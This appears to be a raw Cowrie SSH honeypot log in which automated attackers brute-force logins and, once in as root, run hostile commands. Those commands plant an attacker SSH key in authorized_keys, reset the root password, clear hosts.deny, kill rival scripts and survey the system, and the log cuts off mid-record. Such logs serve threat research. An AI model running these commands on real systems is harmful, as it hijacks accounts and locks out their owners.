{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:03:11.420105Z","src_ip":"212.227.235.229","session":"c426e6dfcca2"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2025","message":"login attempt [root/Kong@2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:03:11.761319Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:12.154395Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.155128Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.156002Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.316798Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc@123","message":"login attempt [test/abc@123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.409544Z","src_ip":"212.227.235.229","session":"c426e6dfcca2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:12.657670Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.658515Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.820481Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.821431Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43744,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4f940b8a484","protocol":"ssh","message":"New connection: 212.227.235.229:43744 (1.2.3.4:22) [session: e4f940b8a484]","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.975161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:03:12.975874Z","src_ip":"212.227.235.229","session":"e4f940b8a484"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:03:13.131436Z","src_ip":"212.227.235.229","session":"e4f940b8a484"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:13.647606Z","src_ip":"212.227.235.229","session":"c426e6dfcca2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:03:13.794765Z","src_ip":"212.227.235.229","session":"e4f940b8a484"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:14.953095Z","src_ip":"212.227.235.229","session":"e4f940b8a484"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44264,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a1f10707775","protocol":"ssh","message":"New connection: 212.227.235.229:44264 (1.2.3.4:22) [session: 6a1f10707775]","sensor":"my-vps","timestamp":"2025-08-26T18:03:15.105705Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:23.182902Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:03:23.183695Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:23.344872Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:23.687029Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"echo \"root:XenVR46WHxck\"|chpasswd|bash","message":"CMD: echo \"root:XenVR46WHxck\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T18:03:23.687740Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a0fed38873d46c36d3250bf07cfcd3b70ff401a2770bb01196924f6d428f32","size":21,"shasum":"52a0fed38873d46c36d3250bf07cfcd3b70ff401a2770bb01196924f6d428f32","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/52a0fed38873d46c36d3250bf07cfcd3b70ff401a2770bb01196924f6d428f32 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:23.848708Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:24.229346Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T18:03:24.230088Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T18:03:24.393827Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:24.394688Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:24.766489Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T18:03:24.767201Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:24.928481Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:25.267578Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T18:03:25.268341Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:25.430134Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:25.854889Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T18:03:25.855651Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T18:03:25.856132Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:26.017735Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:26.409695Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T18:03:26.410627Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:26.574051Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:26.913455Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T18:03:26.914244Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:27.074901Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:27.491188Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T18:03:27.491905Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:27.652603Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:27.993252Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:03:27.994254Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:28.156062Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:28.584435Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T18:03:28.585362Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:28.747015Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:29.125114Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T18:03:29.125797Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:29.286901Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:29.626729Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T18:03:29.627389Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:29.787664Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:30.216211Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T18:03:30.216920Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:30.377868Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:30.721508Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T18:03:30.722204Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:30.884309Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:03:31.310030Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T18:03:31.311071Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:31.474200Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.closed","duration":"20.6","message":"Connection lost after 20.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:31.475452Z","src_ip":"212.227.235.229","session":"e0b29df94be9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":60758,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc17061821ef","protocol":"ssh","message":"New connection: 45.88.8.186:60758 (1.2.3.4:22) [session: fc17061821ef]","sensor":"my-vps","timestamp":"2025-08-26T18:03:43.224964Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:03:43.755836Z","src_ip":"45.88.8.186","session":"fc17061821ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hm